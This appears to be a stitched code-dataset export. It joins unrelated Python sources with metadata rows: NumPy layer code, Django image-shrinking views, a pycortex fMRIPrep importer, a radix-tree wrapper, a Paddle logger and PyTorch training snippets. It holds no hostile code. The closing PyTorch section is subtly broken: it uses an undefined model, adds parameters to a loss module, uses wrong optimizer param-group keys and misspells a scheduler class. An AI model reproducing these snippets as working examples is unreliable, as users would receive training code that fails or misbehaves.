    def backward(self, d_out):
        """
        Backward pass.

        Arguments:
          d_out, np array (batch_size, num_features) - gradient of the loss
            with respect to this layer's output

        Returns:
          np array (batch_size, num_features) - gradient w.r.t. the input
        """
        # Multiplying by the mask builds a NEW array; the original code
        # aliased d_out and zeroed entries in place, silently clobbering
        # the caller's gradient buffer.
        return d_out * self._positive

    def params(self):
        # ReLU has no trainable parameters.
        return {}
class FullyConnectedLayer:
    """Affine (dense) layer computing X.dot(W) + B with trainable Params."""

    def __init__(self, n_input, n_output):
        # Small random initialization, as in the original assignment code.
        self.W = Param(0.001 * np.random.randn(n_input, n_output))
        self.B = Param(0.001 * np.random.randn(1, n_output))
        self.X = None

    def forward(self, X):
        """Forward pass: returns X.dot(W) + B and caches X for backward."""
        output = X.dot(self.W.value) + self.B.value
        self.param = Param(output)
        self.X = Param(X)
        return output

    def backward(self, d_out):
        """
        Backward pass.

        Computes the gradient with respect to the input and stores the
        gradients of W and B on their Param objects.

        Arguments:
          d_out, np array (batch_size, n_output) - gradient of the loss
            with respect to this layer's output

        Returns:
          np array (batch_size, n_input) - gradient w.r.t. the input
        """
        # dL/dW = X^T . d_out ; dL/dB sums d_out over the batch dimension.
        self.W.grad = self.X.value.T.dot(d_out)
        self.B.grad = np.ones((1, d_out.shape[0])).dot(d_out)
        d_input = d_out.dot(self.W.value.T)
        self.grad = d_input
        return d_input

    def params(self):
        """Trainable parameters of this layer."""
        return {'W': self.W, 'B': self.B}
def softmax(predictions):
    '''
    Turn raw scores into probabilities in [0, 1] that sum to one per sample.

    Arguments:
      predictions, np array, shape (N) or (batch_size, N) - classifier output

    Returns:
      np array of the same shape with one probability per class.
    '''
    # Subtracting the per-sample maximum keeps exp() from overflowing while
    # leaving the result mathematically unchanged.
    if predictions.ndim > 1:
        shifted = predictions.T - predictions.max(axis=1)
        exps = np.exp(shifted)
        return (exps / exps.sum(axis=0)).T
    shifted = predictions - np.max(predictions)
    exps = np.exp(shifted)
    return np.array(exps / sum(exps))
def targets(target_index, shape):
    """One-hot array of `shape` for `target_index`, plus the index tuple used to fill it."""
    one_hot = np.zeros(shape)
    hit = (np.arange(len(target_index)), target_index.ravel())
    one_hot[hit] = 1
    return one_hot, hit
| 1,044 | 1,785 | 96 |
15695184dfd4802255290df2638fee74c61572f8 | 6,494 | py | Python | noteshrinker/views.py | rejgan318/noteshrinker-django | 65d32b8c15133bbf37104ba152710b6818ddc573 | [
"MIT"
] | 165 | 2016-09-29T01:32:44.000Z | 2022-03-10T22:36:40.000Z | noteshrinker/views.py | rejgan318/noteshrinker-django | 65d32b8c15133bbf37104ba152710b6818ddc573 | [
"MIT"
] | 8 | 2016-10-26T05:47:17.000Z | 2021-06-27T13:36:25.000Z | noteshrinker/views.py | rejgan318/noteshrinker-django | 65d32b8c15133bbf37104ba152710b6818ddc573 | [
"MIT"
] | 30 | 2016-10-23T23:47:08.000Z | 2021-12-26T11:11:03.000Z | import json
import os
import random
import string
import zipfile
from django.conf import settings
from django.http import Http404, JsonResponse, HttpResponseBadRequest
from django.http import HttpResponse
from django.shortcuts import render
from django.views.decorators.http import require_POST, require_GET
from django.views.generic import CreateView, DeleteView, ListView
from .models import Picture
from .noteshrink_module import AttrDict, notescan_main
from .response import JSONResponse, response_mimetype
from .serialize import serialize
@require_GET
# TODO: 1. Сделать чтобы сохранялись загруженные файлы по сессии - Make uploaded files save between session using session key
# DONE: 2. Удалять сразу не разрешенные файлы - не загружаются - Don't upload from file extensions
# TODO: 3. Проверять отсутсвующие параметры в shrink - Check for missing params in shrink
# DONE: 4. Проверять, существуют ли папки PNG_ROOT и PDF_ROOT - создавать если нет - Check for PNG_ROOT and PDF_ROOT
# TODO: 5. Проверять максимальную длину названий файлов - Check for maximum filename length
# DONE: 6. Сделать кнопку для резета - Make a reset button
# DONE: 7. Сделать view для загрузки ZIP-архива картинок - Make a zip-archive download view
# DONE: 8. Кнопка очистить очищает список загруженных файлов в window, деактивирует кнопку скачать - Clear button must clear window._uploadedFiles, deactivates download button
@require_POST
| 42.168831 | 175 | 0.695873 | import json
import os
import random
import string
import zipfile
from django.conf import settings
from django.http import Http404, JsonResponse, HttpResponseBadRequest
from django.http import HttpResponse
from django.shortcuts import render
from django.views.decorators.http import require_POST, require_GET
from django.views.generic import CreateView, DeleteView, ListView
from .models import Picture
from .noteshrink_module import AttrDict, notescan_main
from .response import JSONResponse, response_mimetype
from .serialize import serialize
def random_string(N):
    """Return a cryptographically random string of N uppercase letters/digits."""
    # Hoisted out of the loop: the original built a fresh SystemRandom
    # instance and a fresh alphabet string for every single character.
    alphabet = string.ascii_uppercase + string.digits
    rng = random.SystemRandom()
    return ''.join(rng.choice(alphabet) for _ in range(N))
@require_GET
def download_pdf(request):
    """Serve a previously generated PDF from PDF_ROOT as an attachment.

    Expects a ``filename`` GET parameter; returns HTTP 400 when the file
    does not exist.
    """
    # SECURITY fix: basename() strips directory components so a crafted
    # filename (e.g. '../../etc/passwd') cannot escape PDF_ROOT.
    filename = os.path.basename(request.GET['filename'])
    file_path = os.path.join(settings.PDF_ROOT, filename)
    if os.path.exists(file_path):
        with open(file_path, 'rb') as fh:
            response = HttpResponse(fh.read(), content_type="application/pdf")
            response['Content-Disposition'] = 'attachment; filename=' + os.path.basename(file_path) + ".pdf"
            return response
    else:
        return HttpResponseBadRequest()
def download_zip(request):
    """Bundle the requested result images from PNG_ROOT into a zip and serve it.

    Expects an ``images`` GET list; returns HTTP 400 when any image is missing.
    """
    images = request.GET.getlist('images')
    compression = zipfile.ZIP_DEFLATED
    # Images produced in one shrink run share a "<random>_" name prefix.
    image_prefix = images[0][:images[0].find('_')]
    zipfile_name = os.path.join(settings.PNG_ROOT, 'noteshrinker_' + image_prefix + '_' + str(len(images)) + '.zip')
    # Context manager guarantees the archive is closed even on early return
    # (the original leaked the open ZipFile on the error path).
    with zipfile.ZipFile(zipfile_name, mode='w', compression=compression) as zf:
        for filename in images:
            # basename() prevents path traversal outside PNG_ROOT.
            filename = os.path.basename(filename)
            file_path = os.path.join(settings.PNG_ROOT, filename)
            if os.path.exists(file_path):
                zf.write(file_path, arcname=filename)
            else:
                # BUG fix: the original returned the HttpResponseBadRequest
                # class object itself instead of an instantiated response.
                return HttpResponseBadRequest()
    with open(zipfile_name, 'rb') as fh:
        response = HttpResponse(fh.read(), content_type="application/x-zip-compressed")
        response['Content-Disposition'] = 'attachment; filename=' + os.path.basename(zipfile_name)
        return response
def index(request):
    # Landing page with the upload form and the shrink controls.
    return render(request, 'index.html')
# TODO: 1. Сделать чтобы сохранялись загруженные файлы по сессии - Make uploaded files save between session using session key
# DONE: 2. Удалять сразу не разрешенные файлы - не загружаются - Don't upload from file extensions
# TODO: 3. Проверять отсутсвующие параметры в shrink - Check for missing params in shrink
# DONE: 4. Проверять, существуют ли папки PNG_ROOT и PDF_ROOT - создавать если нет - Check for PNG_ROOT and PDF_ROOT
# TODO: 5. Проверять максимальную длину названий файлов - Check for maximum filename length
# DONE: 6. Сделать кнопку для резета - Make a reset button
# DONE: 7. Сделать view для загрузки ZIP-архива картинок - Make a zip-archive download view
# DONE: 8. Кнопка очистить очищает список загруженных файлов в window, деактивирует кнопку скачать - Clear button must clear window._uploadedFiles, deactivates download button
@require_POST
def shrink(request):
    """Run the noteshrink pipeline on previously uploaded images.

    Reads the algorithm parameters and the image list from POST, validates
    them, runs ``notescan_main`` and returns JSON with the produced PNG
    names and the PDF name. Raises Http404 when no listed file exists;
    returns HTTP 400 on malformed numeric parameters.
    """
    files = request.POST.getlist('files[]')
    existing_files = []
    for name in files:
        path = os.path.join(settings.MEDIA_ROOT, 'pictures', name)
        if os.path.exists(path):
            existing_files.append(path)
    if not existing_files:
        # BUG fix: the original did `return Http404`, handing the exception
        # class back as a "response"; it must be raised for Django to
        # produce a 404 page.
        raise Http404
    def on_off(value):
        # HTML checkbox values arrive as the string 'on' when ticked.
        return value == 'on'
    try:
        num_colors = int(request.POST['num_colors'])
        sample_fraction = float(request.POST['sample_fraction']) * 0.01
        sat_threshold = float(request.POST['sat_threshold'])
        value_threshold = float(request.POST['value_threshold'])
    except ValueError as e:
        return HttpResponseBadRequest(str(e))
    # Prefix output names with a random token to avoid collisions between runs.
    if request.POST['pdfname'].find('.pdf') == -1:
        pdfname = random_string(settings.RANDOM_STRING_LEN) + "_" + request.POST['pdfname'] + '.pdf'
    else:
        pdfname = random_string(settings.RANDOM_STRING_LEN) + "_" + request.POST['pdfname']
    basename = random_string(settings.RANDOM_STRING_LEN) + "_" + request.POST['basename']
    options = {
        "basename": basename,  # base name for the output images
        "filenames": existing_files,  # absolute paths of the input files
        "global_palette": on_off(request.POST['global_palette']),  # one palette for all images
        "num_colors": num_colors,  # number of colors in the output
        "pdf_cmd": 'convert %i %o',  # command used to build the PDF
        "pdfname": os.path.join(settings.PDF_ROOT, pdfname),  # output PDF path
        "postprocess_cmd": None,
        "postprocess_ext": '_post.png',  # suffix for post-processed images
        "quiet": False,  # reduce console output
        "sample_fraction": sample_fraction,  # fraction of pixels to sample
        "sat_threshold": sat_threshold,  # background saturation threshold
        "saturate": True,  # saturate output colors
        "sort_numerically": on_off(request.POST['sort_numerically']),  # keep numeric file order
        "value_threshold": value_threshold,  # background value threshold
        "white_bg": on_off(request.POST['white_bg']),  # force a white background
        "picture_folder": settings.PNG_ROOT  # where to save the output images
    }
    pngs, pdf = notescan_main(AttrDict(options))
    return JsonResponse({"pngs": pngs, "pdf": pdfname})
class PictureCreateView(CreateView):
    """Handles picture uploads; answers in the jQuery-File-Upload JSON format."""
    model = Picture
    fields = "__all__"
    template_name = 'index.html'
    def form_valid(self, form):
        """Save the uploaded picture and return its serialized metadata as JSON."""
        self.object = form.save()
        files = [serialize(self.object)]
        data = {'files': files}
        response = JSONResponse(data, mimetype=response_mimetype(self.request))
        response['Content-Disposition'] = 'inline; filename=files.json'
        return response
    def form_invalid(self, form):
        """Return the form validation errors as a JSON body with HTTP 400."""
        data = json.dumps(form.errors)
        return HttpResponse(content=data, status=400, content_type='application/json')
class PictureDeleteView(DeleteView):
    """Deletes a picture and acknowledges with the uploader's JSON format."""
    model = Picture
    def delete(self, request, *args, **kwargs):
        """Delete the picture (file removal happens in the model) and return JSON."""
        self.object = self.get_object()
        self.object.delete()
        response = JSONResponse(True, mimetype=response_mimetype(request))
        response['Content-Disposition'] = 'inline; filename=files.json'
        return response
class PictureListView(ListView):
    """Lists all stored pictures in the jQuery-File-Upload JSON format."""
    model = Picture
    def render_to_response(self, context, **response_kwargs):
        """Serialize every picture and return the list as a JSON response."""
        files = [serialize(p) for p in self.get_queryset()]
        data = {'files': files}
        response = JSONResponse(data, mimetype=response_mimetype(self.request))
        response['Content-Disposition'] = 'inline; filename=files.json'
        return response
| 4,896 | 265 | 182 |
6340455722a0e233ef3782030c5cda6f4f9191ee | 3,304 | py | Python | cortex/fmriprep.py | alebel14/pycortex | c8d75b3108cb981fde88f7ebb70592bd3f69a3ea | [
"BSD-2-Clause"
] | 1 | 2020-09-30T02:11:27.000Z | 2020-09-30T02:11:27.000Z | cortex/fmriprep.py | alebel14/pycortex | c8d75b3108cb981fde88f7ebb70592bd3f69a3ea | [
"BSD-2-Clause"
] | null | null | null | cortex/fmriprep.py | alebel14/pycortex | c8d75b3108cb981fde88f7ebb70592bd3f69a3ea | [
"BSD-2-Clause"
] | 1 | 2019-03-04T02:45:59.000Z | 2019-03-04T02:45:59.000Z | from . import database
import os.path as op
import shutil
from .freesurfer import parse_curv
import numpy as np
def import_subj(subject,
                source_dir,
                session=None,
                sname=None):
    """Imports a subject from fmriprep-output.

    See https://fmriprep.readthedocs.io/en/stable/

    Parameters
    ----------
    subject : string
        Fmriprep subject name (without "sub-")
    source_dir : string
        Local directory that contains both fmriprep and freesurfer subfolders
    session : string, optional
        BIDS session that contains the anatomical data (leave to default if
        not a specific session)
    sname : string, optional
        Pycortex subject name. By default uses the same name as the
        freesurfer subject.
    """
    if sname is None:
        sname = subject
    database.db.make_subj(sname)
    # Filestore templates; the remaining {name}/{hemi} fields are filled below.
    surfs = op.join(database.default_filestore, sname, "surfaces", "{name}_{hemi}.gii")
    anats = op.join(database.default_filestore, sname, "anatomicals", "{name}.nii.gz")
    surfinfo = op.join(database.default_filestore, sname, "surface-info", "{name}.npz")
    fmriprep_dir = op.join(source_dir, 'fmriprep')
    if session is not None:
        # BUG fix: the session placeholder was never substituted, so the
        # directory literally contained 'ses-{session}' and the later
        # .format() calls on the full path raised KeyError('session').
        fmriprep_dir = op.join(fmriprep_dir, 'ses-{session}'.format(session=session))
        session_str = '_ses-{session}'.format(session=session)
    else:
        session_str = ''
    # import anatomical data (preprocessed T1w and the aseg label volume)
    fmriprep_dir = op.join(fmriprep_dir, 'sub-{subject}', 'anat')
    t1w = op.join(fmriprep_dir, 'sub-{subject}{session_str}_T1w_preproc.nii.gz')
    aseg = op.join(fmriprep_dir, 'sub-{subject}{session_str}_T1w_label-aseg_roi.nii.gz')
    for fmp_fn, out_fn in zip([t1w.format(subject=subject, session_str=session_str),
                               aseg.format(subject=subject, session_str=session_str)],
                              [anats.format(name='raw'),
                               anats.format(name='aseg')]):
        shutil.copy(fmp_fn, out_fn)
    # import surfaces, mapping fmriprep surface names onto pycortex names
    fmpsurf = op.join(fmriprep_dir,
                      'sub-{subject}{session_str}_T1w_').format(subject=subject,
                                                                session_str=session_str)
    fmpsurf = fmpsurf + '{fmpname}.{fmphemi}.surf.gii'
    for fmpname, name in zip(['smoothwm', 'pial', 'midthickness', 'inflated'],
                             ['wm', 'pia', 'fiducial', 'inflated']):
        for fmphemi, hemi in zip(['L', 'R'],
                                 ['lh', 'rh']):
            source = fmpsurf.format(fmpname=fmpname,
                                    fmphemi=fmphemi)
            target = str(surfs.format(subj=sname, name=name, hemi=hemi))
            shutil.copy(source, target)
    # import surface info (freesurfer curvature maps, sign-flipped to
    # match pycortex's convention)
    curvs = op.join(source_dir,
                    'freesurfer',
                    'sub-{subject}',
                    'surf',
                    '{hemi}.{info}')
    for curv, info in dict(sulc="sulcaldepth", thickness="thickness", curv="curvature").items():
        lh, rh = [parse_curv(curvs.format(hemi=hemi, info=curv, subject=subject)) for hemi in ['lh', 'rh']]
        np.savez(surfinfo.format(subj=sname, name=info), left=-lh, right=-rh)
database.db = database.Database()
| 38.870588 | 107 | 0.58414 | from . import database
import os.path as op
import shutil
from .freesurfer import parse_curv
import numpy as np
def import_subj(subject,
                source_dir,
                session=None,
                sname=None):
    """Imports a subject from fmriprep-output.

    See https://fmriprep.readthedocs.io/en/stable/

    Parameters
    ----------
    subject : string
        Fmriprep subject name (without "sub-")
    source_dir : string
        Local directory that contains both fmriprep and freesurfer subfolders
    session : string, optional
        BIDS session that contains the anatomical data (leave to default if
        not a specific session)
    sname : string, optional
        Pycortex subject name. By default uses the same name as the
        freesurfer subject.
    """
    if sname is None:
        sname = subject
    database.db.make_subj(sname)
    # Filestore templates; the remaining {name}/{hemi} fields are filled below.
    surfs = op.join(database.default_filestore, sname, "surfaces", "{name}_{hemi}.gii")
    anats = op.join(database.default_filestore, sname, "anatomicals", "{name}.nii.gz")
    surfinfo = op.join(database.default_filestore, sname, "surface-info", "{name}.npz")
    fmriprep_dir = op.join(source_dir, 'fmriprep')
    if session is not None:
        # BUG fix: the session placeholder was never substituted, so the
        # directory literally contained 'ses-{session}' and the later
        # .format() calls on the full path raised KeyError('session').
        fmriprep_dir = op.join(fmriprep_dir, 'ses-{session}'.format(session=session))
        session_str = '_ses-{session}'.format(session=session)
    else:
        session_str = ''
    # import anatomical data (preprocessed T1w and the aseg label volume)
    fmriprep_dir = op.join(fmriprep_dir, 'sub-{subject}', 'anat')
    t1w = op.join(fmriprep_dir, 'sub-{subject}{session_str}_T1w_preproc.nii.gz')
    aseg = op.join(fmriprep_dir, 'sub-{subject}{session_str}_T1w_label-aseg_roi.nii.gz')
    for fmp_fn, out_fn in zip([t1w.format(subject=subject, session_str=session_str),
                               aseg.format(subject=subject, session_str=session_str)],
                              [anats.format(name='raw'),
                               anats.format(name='aseg')]):
        shutil.copy(fmp_fn, out_fn)
    # import surfaces, mapping fmriprep surface names onto pycortex names
    fmpsurf = op.join(fmriprep_dir,
                      'sub-{subject}{session_str}_T1w_').format(subject=subject,
                                                                session_str=session_str)
    fmpsurf = fmpsurf + '{fmpname}.{fmphemi}.surf.gii'
    for fmpname, name in zip(['smoothwm', 'pial', 'midthickness', 'inflated'],
                             ['wm', 'pia', 'fiducial', 'inflated']):
        for fmphemi, hemi in zip(['L', 'R'],
                                 ['lh', 'rh']):
            source = fmpsurf.format(fmpname=fmpname,
                                    fmphemi=fmphemi)
            target = str(surfs.format(subj=sname, name=name, hemi=hemi))
            shutil.copy(source, target)
    # import surface info (freesurfer curvature maps, sign-flipped to
    # match pycortex's convention)
    curvs = op.join(source_dir,
                    'freesurfer',
                    'sub-{subject}',
                    'surf',
                    '{hemi}.{info}')
    for curv, info in dict(sulc="sulcaldepth", thickness="thickness", curv="curvature").items():
        lh, rh = [parse_curv(curvs.format(hemi=hemi, info=curv, subject=subject)) for hemi in ['lh', 'rh']]
        np.savez(surfinfo.format(subj=sname, name=info), left=-lh, right=-rh)
database.db = database.Database()
| 0 | 0 | 0 |
02ddb609928a9cb820ef7a22bc662c645b8fa8ed | 1,218 | py | Python | radix/__init__.py | otetard/py-radix | df062a57c8bd6aaafd7f76e16ce4abe5dfbd4b8a | [
"BSD-4-Clause-UC"
] | null | null | null | radix/__init__.py | otetard/py-radix | df062a57c8bd6aaafd7f76e16ce4abe5dfbd4b8a | [
"BSD-4-Clause-UC"
] | null | null | null | radix/__init__.py | otetard/py-radix | df062a57c8bd6aaafd7f76e16ce4abe5dfbd4b8a | [
"BSD-4-Clause-UC"
] | 1 | 2022-03-02T20:26:15.000Z | 2022-03-02T20:26:15.000Z | try:
from ._radix import Radix as _Radix
except Exception as e:
from .radix import Radix as _Radix
__version__ = '1.0.0'
__all__ = ['Radix']
# This acts as an entrypoint to the underlying object (be it a C
# extension or pure python representation, pickle files will work)
| 30.45 | 66 | 0.646141 | try:
from ._radix import Radix as _Radix
except Exception as e:
from .radix import Radix as _Radix
__version__ = '1.0.0'
__all__ = ['Radix']
# This acts as an entrypoint to the underlying object (be it a C
# extension or pure python representation, pickle files will work)
class Radix(object):
    """Pickle-friendly facade over the underlying radix tree backend
    (C extension when available, pure-Python fallback otherwise).

    Wrapping instead of subclassing means pickle files remain portable
    between the two backends.
    """
    def __init__(self):
        # Bind the backend's methods directly onto the instance so calls
        # bypass this wrapper entirely.
        self._radix = _Radix()
        self.add = self._radix.add
        self.delete = self._radix.delete
        self.search_exact = self._radix.search_exact
        self.search_best = self._radix.search_best
        self.search_worst = self._radix.search_worst
        self.search_covered = self._radix.search_covered
        self.search_covering = self._radix.search_covering
        self.nodes = self._radix.nodes
        self.prefixes = self._radix.prefixes
    def __iter__(self):
        # Delegate iteration to the backend's node iterator.
        for elt in self._radix:
            yield elt
    def __getstate__(self):
        # Serialize as a list of (prefix, data-dict) pairs.
        return [(elt.prefix, elt.data) for elt in self]
    def __setstate__(self, state):
        # Rebuild the tree node by node from the serialized pairs.
        for prefix, data in state:
            node = self._radix.add(prefix)
            for key in data:
                node.data[key] = data[key]
    def __reduce__(self):
        # Pickle protocol: recreate via the constructor, then restore state.
        return (Radix, (), self.__getstate__())
| 779 | -1 | 156 |
d4f18ce0ff738c966f1e237beffc9da366e3ae64 | 2,521 | py | Python | python/paddle/hapi/logger.py | TingquanGao/Paddle | 9b1015d90b4d498ab58df7cff2c3ed27863ce970 | [
"Apache-2.0"
] | 10 | 2021-05-12T07:20:32.000Z | 2022-03-04T08:21:56.000Z | python/paddle/hapi/logger.py | AFLee/Paddle | 311b3b44fc7d51d4d66d90ab8a3fc0d42231afda | [
"Apache-2.0"
] | 1 | 2021-01-25T09:40:19.000Z | 2021-01-25T09:40:19.000Z | python/paddle/hapi/logger.py | AFLee/Paddle | 311b3b44fc7d51d4d66d90ab8a3fc0d42231afda | [
"Apache-2.0"
] | 25 | 2019-12-07T02:14:14.000Z | 2021-12-30T06:16:30.000Z | # Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import sys
import logging
from paddle.fluid.dygraph.parallel import ParallelEnv
def setup_logger(output=None, name="hapi", log_level=logging.INFO):
    """
    Initialize logger of hapi and set its verbosity level to "INFO".

    Args:
        output (str): a file name or a directory to save log. If None, will not save log file.
            If ends with ".txt" or ".log", assumed to be a file name.
            Otherwise, logs will be saved to `output/log.txt`.
        name (str): the root module name of this logger. Default: 'hapi'.
        log_level (enum): log level. eg.'INFO', 'DEBUG', 'ERROR'. Default: logging.INFO.

    Returns:
        logging.Logger: a logger
    """
    logger = logging.getLogger(name)
    logger.propagate = False
    logger.setLevel(log_level)
    format_str = '%(asctime)s - %(name)s - %(levelname)s - %(message)s'
    # stdout logging: only local rank==0
    local_rank = ParallelEnv().local_rank
    if local_rank == 0 and len(logger.handlers) == 0:
        ch = logging.StreamHandler(stream=sys.stdout)
        ch.setLevel(log_level)
        ch.setFormatter(logging.Formatter(format_str))
        logger.addHandler(ch)
    # file logging if output is not None: all workers
    if output is not None:
        if output.endswith(".txt") or output.endswith(".log"):
            filename = output
        else:
            filename = os.path.join(output, "log.txt")
        # Non-zero ranks write to their own file to avoid interleaving.
        if local_rank > 0:
            filename = filename + ".rank{}".format(local_rank)
        log_dir = os.path.dirname(filename)
        # BUG fix: guard against an empty dirname (bare file name would make
        # makedirs('') raise) and use exist_ok to avoid a check/create race.
        if log_dir:
            os.makedirs(log_dir, exist_ok=True)
        # BUG fix: the original used logging.StreamHandler(filename), which
        # treats the path string as a stream object and crashes on the first
        # emit; FileHandler actually opens the path for writing.
        fh = logging.FileHandler(filename)
        fh.setLevel(log_level)
        fh.setFormatter(logging.Formatter(format_str))
        logger.addHandler(fh)
    return logger
| 35.013889 | 94 | 0.678302 | # Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import sys
import logging
from paddle.fluid.dygraph.parallel import ParallelEnv
def setup_logger(output=None, name="hapi", log_level=logging.INFO):
    """
    Initialize logger of hapi and set its verbosity level to "INFO".

    Args:
        output (str): a file name or a directory to save log. If None, will not save log file.
            If ends with ".txt" or ".log", assumed to be a file name.
            Otherwise, logs will be saved to `output/log.txt`.
        name (str): the root module name of this logger. Default: 'hapi'.
        log_level (enum): log level. eg.'INFO', 'DEBUG', 'ERROR'. Default: logging.INFO.

    Returns:
        logging.Logger: a logger
    """
    logger = logging.getLogger(name)
    logger.propagate = False
    logger.setLevel(log_level)
    format_str = '%(asctime)s - %(name)s - %(levelname)s - %(message)s'
    # stdout logging: only local rank==0
    local_rank = ParallelEnv().local_rank
    if local_rank == 0 and len(logger.handlers) == 0:
        ch = logging.StreamHandler(stream=sys.stdout)
        ch.setLevel(log_level)
        ch.setFormatter(logging.Formatter(format_str))
        logger.addHandler(ch)
    # file logging if output is not None: all workers
    if output is not None:
        if output.endswith(".txt") or output.endswith(".log"):
            filename = output
        else:
            filename = os.path.join(output, "log.txt")
        # Non-zero ranks write to their own file to avoid interleaving.
        if local_rank > 0:
            filename = filename + ".rank{}".format(local_rank)
        log_dir = os.path.dirname(filename)
        # BUG fix: guard against an empty dirname (bare file name would make
        # makedirs('') raise) and use exist_ok to avoid a check/create race.
        if log_dir:
            os.makedirs(log_dir, exist_ok=True)
        # BUG fix: the original used logging.StreamHandler(filename), which
        # treats the path string as a stream object and crashes on the first
        # emit; FileHandler actually opens the path for writing.
        fh = logging.FileHandler(filename)
        fh.setLevel(log_level)
        fh.setFormatter(logging.Formatter(format_str))
        logger.addHandler(fh)
    return logger
| 0 | 0 | 0 |
810f92db062fdf62ffd23425e50d565e2ea12589 | 10,919 | py | Python | pytorch/torch_train.py | LianShuaiLong/Codebook | fd67440d2de80b48aa90b9f7ea5d459baee0a6d8 | [
"MIT"
] | null | null | null | pytorch/torch_train.py | LianShuaiLong/Codebook | fd67440d2de80b48aa90b9f7ea5d459baee0a6d8 | [
"MIT"
] | null | null | null | pytorch/torch_train.py | LianShuaiLong/Codebook | fd67440d2de80b48aa90b9f7ea5d459baee0a6d8 | [
"MIT"
] | null | null | null | import torch
import torch.nn as nn
import numpy as np
#******************** Model training *******************************#
criterion = nn.CrossEntropyLoss()
optimizer = torch.optim.Adam(model.parameters(),lr=learning_rate)
device = 'cuda' if torch.cuda.is_available() else 'cpu'
model = model.to(device)
for epoch in range(train_epochs):
    for i,(images,labels) in enumerate(train_loader):
        images = images.cuda()
        labels = labels.cuda()
        outs = model(images)
        loss = criterion(outs,labels)
        # In PyTorch, backward() accumulates gradients instead of
        # overwriting them. Each mini-batch must not mix its gradients
        # with those of previous batches, so zero them out first.
        optimizer.zero_grad()
        loss.backward()
        optimizer.step()
    print(f'Epoch:{epoch},Loss:{loss.item()}...')
#******************** Model evaluation ************************#
model.eval() # switches BatchNorm and Dropout layers to inference mode
with torch.no_grad():
    correct = 0
    total = 0
    for images,labels in test_loader:
        images = images.to(device)
        labels = labels.to(device)
        outputs = model(images)
        pred = torch.argmax(outputs,1).item()
        correct+= (torch.argmax(outputs,1)==labels).sum().cpu().data.numpy()
        total += len(images)
    print(f'acc:{correct/total:.3f}')
#****************自定义loss*************************#
#***************标签平滑,有很强的聚类效果???****************************#
# https://zhuanlan.zhihu.com/p/302843504 label smoothing 分析
# 写一个label_smoothing.py 的文件,然后再训练代码里面引用,用LSR代替交叉熵损失即可
import torch
import torch.nn as nn
# timm 库中有现成的接口
# PyTorchImageModels
# from timm.loss import LabelSmoothingCrossEntrophy
# from timm.loss import SoftTargetCrossEntrophy
# criterion = LabelSmoothingCrossEntrophy(smoothing=config.MODEL.LABEL_SMOOTHING)
# criterion = SoftTargetCrossEntrophy()
# 或者直接再训练过程中进行标签平滑
for images, labels in train_loader:
images, labels = images.cuda(), labels.cuda()
N = labels.size(0)
# C is the number of classes.
smoothed_labels = torch.full(size=(N, C), fill_value=0.1 / (C - 1)).cuda()
smoothed_labels.scatter_(dim=1, index=torch.unsqueeze(labels, dim=1), value=0.9)
score = model(images)
log_prob = torch.nn.functional.log_softmax(score, dim=1)
loss = -torch.sum(log_prob * smoothed_labels) / N
optimizer.zero_grad()
loss.backward()
optimizer.step()
#******************************Mixup训练,数据增强的一种方式***********************************#
# mixup采用对不同类别之间进行建模的方式实现数据增强,而通用数据增强方法则是针对同一类做变换。(经验风险最小->邻域风险最小),提升对抗样本及噪声样本的鲁棒性
# 思路非常简单:
# 从训练样本中随机抽取两个样本进行简单的随机加权求和,对于标签,相当于加权后的样本有两个label
# 求loss的时候,对两个label的loss进行加权,在反向求导更新参数。
# https://zhuanlan.zhihu.com/p/345224408
# distributions包含可参数化的概率分布和采样函数
# timm库有现成接口
# from timm.data import Mixup
# mixup_fn = Mixup(
# mixup_alpha=0.8,
# cutmix_alpha=1.0,
# cutmix_minmax=None,
# prob=1.0,
# switch_prob=0.5,
# mode='batch',
# label_smoothing=0.1,
# num_classes=1000)
# x,y = mixup_fn(x,y)
# Mixing coefficient lambda ~ Beta(alpha, alpha).
beta_distribution = torch.distributions.beta.Beta(alpha, alpha)
for images, labels in train_loader:
    images, labels = images.cuda(), labels.cuda()
    # Mixup images and labels: blend each sample with a randomly
    # permuted partner from the same batch.
    lambda_ = beta_distribution.sample([]).item()
    index = torch.randperm(images.size(0)).cuda()
    mixed_images = lambda_ * images + (1 - lambda_) * images[index, :]
    label_a, label_b = labels, labels[index]
    # Mixup loss: weight the two labels' losses by the same coefficient.
    scores = model(mixed_images)
    loss = (lambda_ * loss_function(scores, label_a)
            + (1 - lambda_) * loss_function(scores, label_b))
    optimizer.zero_grad()
    loss.backward()
    optimizer.step()
#************************正则化***********************
# l1正则化
loss = nn.CrossEntropyLoss()
for param in model.parameters():
loss += torch.sum(torch.abs(param))
loss.backward()
# l2正则化,pytorch中的weight_decay相当于l2正则化
bias_list = (param for name, param in model.named_parameters() if name[-4:] == 'bias')
others_list = (param for name, param in model.named_parameters() if name[-4:] != 'bias')
parameters = [{'parameters': bias_list, 'weight_decay': 0},
{'parameters': others_list}]
optimizer = torch.optim.SGD(parameters, lr=1e-2, momentum=0.9, weight_decay=1e-4)
#*********************梯度裁剪*************************#
torch.nn.utils.clip_grad_norm_(model.parameters(),max_norm=20)
#********************得到当前学习率*********************#
# If there is one global learning rate (which is the common case).
lr = next(iter(optimizer.param_groups))['lr']
# If there are multiple learning rates for different layers.
all_lr = []
for param_group in optimizer.param_groups:
all_lr.append(param_group['lr'])
#在一个batch训练代码中,当前的lr是optimzer.param_groups[0]['lr']
#**********************学习率衰减************************#
scheduler = torch.optim.lr_scheduler.ReduceLROnPlateaue(optimizer,mode='max',patience=5,verbose=True)
for epoch in range(num_epochs):
train_one_epoch(...)
val(...)
scheduler.step(val_acc)
# Cosine annealing learning rate
